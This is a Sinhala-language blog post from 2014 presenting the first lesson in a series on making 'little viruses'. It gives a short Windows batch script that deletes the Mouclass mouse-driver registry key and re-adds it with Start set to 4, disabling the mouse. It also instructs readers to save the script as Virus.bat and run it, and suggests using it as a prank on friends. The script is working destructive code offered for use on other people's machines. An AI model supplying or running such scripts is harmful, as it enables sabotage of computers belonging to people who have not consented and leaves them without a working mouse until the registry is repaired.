Blogger Tips and TricksLatest Tips And TricksBlogger Tricks
Blogger Tips and TricksLatest Tips And TricksBlogger Tricks

Wednesday, July 30, 2014

පුංචි පුංචි Virus හදමු පළමු කුප්පිය - Mouse එක Disable කරන Vrus එකක් හදමු..



ඔන්න අද අපේ පුංචි පුංචි Virus හදමු පළමු කුප්පිය දෙන්න හිතුවා.. මේක ගොඩක් සරල මට්ටමේ Vrus එකක්.. මේකෙන් වෙන්නේ Mouse එක වැඩ නොකර යන එක.. යාලුවන්ට එහෙම පොඩි ආතල් එකක් දෙන්නත් එක්ක හදල බලන්න.. අපි මේක හදන්නේ Notepad එක Use කරලා..

  • මුළින්ම ඔය පහළ තියෙන Code එක Notepad එකේ ඔය තියෙන විදියටම Type කරගන්න..

rem -----------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem -----------

  • එහෙම බැරිනම් ඔන්න පහළ තියෙනවා 2 KB විතරයි බාගන්න. 

 Mouse එක Disable කරන Vrus එකක් හදමු..


  • දැන් ඒක ඔයාගේ Notepad එකේ Open කරගන්න.
  • හරි අපි දැන් මේක Save කරගමු..
  • ඔයා කැමත් තැනක ඕක Virus.bat කියල Save කරගන්න.. ( අනිවා .bat කියන එක තියෙන්න ඕනි Name එකේ අගට )


දැන් ඉතින් තියෙන්නේ ඕක Run කරන එක විතයි... Mouse එක Dissable වෙයි...

එහෙනම් අපි ගියා.. අලුත් Post එකකින් හමුවෙමු..